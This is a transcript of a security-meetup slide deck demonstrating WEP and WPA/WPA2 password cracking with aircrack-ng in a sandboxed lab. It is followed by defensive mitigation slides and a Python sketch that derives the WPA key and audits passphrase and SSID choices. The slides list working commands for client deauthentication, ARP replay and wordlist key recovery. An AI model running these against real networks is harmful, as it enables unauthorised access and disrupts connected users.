Feb-8-2012-Breaking-Wireless-Security


Presentation I gave at DC207's regular meeting hosted at BlueTarp Financial (https://www.bluetarp.com).

The presentation is a quick overview, given to a group of industry professionals and university students (many of whom have never done anything like this), of using the aircrack-ng suite of tools to crack WEP and WPA passwords. A sandboxed wireless network was set up and live demonstrations were done.

Transcript

  • 1. Breaking Wireless Security cracking WEP & WPA presented by Casey DC207
  • 2. what we're covering
    • Using aircrack-ng suite to
      • capture wireless traffic
      • retrieve WEP password
      • retrieve WPA/WPA2 passwords
  • 5. what we're not covering
    • cryptographic specifics
    • in depth packet analysis
    • brute forcing WPS (Wi-Fi Protected Setup)
      • time
  • 8. t00ls
    • BackTrack Linux
    • Aircrack-ng
    • ALFA Wireless USB Adapter
      • (Model AWUS036H)
  • 11. Yay! BlueTarp!
  • 12. WEP
    • Wired Equivalent Privacy (WEP)
    • Sept. 1999 in original 802.11 standard
    • uses an RC4 Stream Cipher
    • crypto is inherently flawed
    • deprecated in 2004 in favor of WPA2
    • still available on routers today
  • 18. WEP encryption
    • RC4 cipher uses Key + IV (Initial Values)
    • August 2001, Scott Fluhrer, Itsik Mantin, and Adi Shamir
    • passive attack to recover Key
    • need a busy network or a way to produce enough traffic
    • with enough IVs can calculate the Key
  • 23. cracking WEP
    • place card in monitor mode
      • # airmon-ng start wlan0
    • capture packets to the desired AP
      • # airodump-ng mon0 --bssid bssid --channel c --write crackme
    • wait for an authorized client to connect
      • can also deauthorize clients
        • # aireplay-ng -0 5 -a bssid mon0
    • spoof ARP responses to generate more traffic
      • # aireplay-ng -3 -b bssid -h client_mac mon0
    • use aircrack-ng to crack the key
      • # aircrack-ng crackme.cap
  • 24. DEMO
  • 25. WEP cracking mitigation
    • none.
    • don't use.
    • password complexity DOES NOT MATTER
  • 28. WPA
    • Wi-Fi Protected Access
    • WPA became available in 1999
    • uses TKIP encryption algorithm
    • intermediate step until WPA2
  • 32. WPA2
    • WPA2 available in 2004
    • uses CCMP-AES encryption
    • WPA-Personal PSK (Pre-Shared Key)
      • home/small office use
    • WPA-Enterprise
      • Requires a RADIUS server for authentication
  • 35. WPA encryption
    • encryption based on AES
    • no known public exploits that attack the crypto
    • brute force attack
    • uses SSID of network as part of encryption
    • precomputation is much harder
  • 40. Yay! BlueTarp!
  • 41. cracking WPA / WPA2
    • place card in monitor mode
      • # airmon-ng start wlan0
    • capture packets to the desired AP
      • # airodump-ng mon0 --bssid bssid --channel c --write crackme
    • capture handshake from connecting client
      • can force clients to deauth to capture it
        • # aireplay-ng -0 5 -a bssid mon0
    • use aircrack-ng to try and brute force key
      • requires a good wordlist
        • # aircrack-ng crackme.cap -w wordlist
  • 42. DEMO
  • 43. WPA cracking mitigation
    • use a password >= 15 characters
    • don't use a name in the top 1000 SSID list
    • disable WPS!
  • 46. WPS
    • Wi-Fi Protected Setup
    • attempt at easy secure access
    • wanted to make it easy to add new devices
    • almost universally enabled on new routers
    • completely fails to brute force attack
      • revealed in December 2011
      • get the WPS pin, use it to retrieve the PSK
    • when enabled renders WPA/WPA2 useless
    • Linksys routers still vulnerable with WPS disabled
  • 53. Thanks for coming! Thank you Jon and BlueTarp for hosting and food! Questions? Help? [email_address] @CaseyDunham dc207.org @DCG207
  • 54. resources
    • BackTrack Linux backtrack-linux.org
    • Aircrack-ng aircrack-ng.org
    • ALFA Networks alfa.com.tw
    • DC207 dc207.org
    • BlueTarp bluetarp.com
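
The "WPA encryption" and "WPA cracking mitigation" slides say the SSID is part of the key material and recommend a long passphrase and an uncommon SSID. The sketch below is an added example, not code from the presentation: it derives the WPA/WPA2-Personal key with PBKDF2-HMAC-SHA1 (SSID as salt) to show why a table built for one SSID does not carry over to another, and checks a configuration against the slide's two rules. The `COMMON_SSIDS` entries and the `dc207-lab` SSID are constructed samples; the slides do not include the list itself.

```python
import hashlib

# Constructed sample entries: the slides mention a "top 1000 SSID list"
# but do not include it.
COMMON_SSIDS = {"linksys", "NETGEAR", "dlink", "default"}

def wpa_pmk(passphrase, ssid):
    """WPA/WPA2-Personal key derivation: PBKDF2-HMAC-SHA1 with the SSID
    as salt, 4096 iterations, 32-byte output."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)

def audit_psk_config(ssid, passphrase, min_len=15, common_ssids=COMMON_SSIDS):
    """Apply the slide's mitigations; returns a list of findings (empty = pass)."""
    findings = []
    if len(passphrase) < min_len:
        findings.append(f"passphrase is {len(passphrase)} chars, want >= {min_len}")
    if ssid in common_ssids:
        findings.append(f"SSID {ssid!r} is on the common-SSID list; "
                        "precomputed tables may already exist for it")
    return findings

if __name__ == "__main__":
    # Same passphrase, different SSIDs: the derived keys are unrelated,
    # so work done against one SSID cannot be reused against the other.
    for ssid in ("linksys", "dc207-lab"):
        print(ssid, wpa_pmk("correct horse battery", ssid).hex())
    print(audit_psk_config("linksys", "password1"))
    print(audit_psk_config("dc207-lab", "correct horse battery staple"))
```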
